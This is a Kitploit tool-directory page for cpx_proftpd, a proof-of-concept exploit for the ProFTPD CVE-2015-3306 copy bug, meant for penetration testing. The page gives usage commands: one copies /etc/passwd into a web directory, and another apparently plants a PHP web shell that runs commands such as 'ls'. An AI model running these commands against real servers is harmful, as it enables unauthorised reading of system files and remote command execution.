Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cpx_proftpd — Tool for exploit CVE-2015-3306 | Kitploit
Tools/GitHubGitHub/xyk0x/cpx_proftpd
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubxyk0x/cpx_proftpd

cpx_proftpd

Tool for exploit CVE-2015-3306

View Repository
1511 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

cpx_proftpd

PoC by Daniel Aldana for CVE-2015-3306 exploitation. Bug reported by Vadim Melihow.

###METHOD 1:

usage:

root@kitploit:~
python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_SRC_FILE> <REMOTE_ABSOLUTEPATH_DST_FILE>

ex:

root@kitploit:~
python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt

then try:

root@kitploit:~
http://127.0.0.1/pass.txt

###METHOD 2:

usage:

root@kitploit:~
python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_WEBDIR>

ex:

root@kitploit:~
python cpx_proftp.py 127.0.0.1 /var/www/html

then try:

root@kitploit:~
http://127.0.0.1/lndex.php?img=ls
Download Tool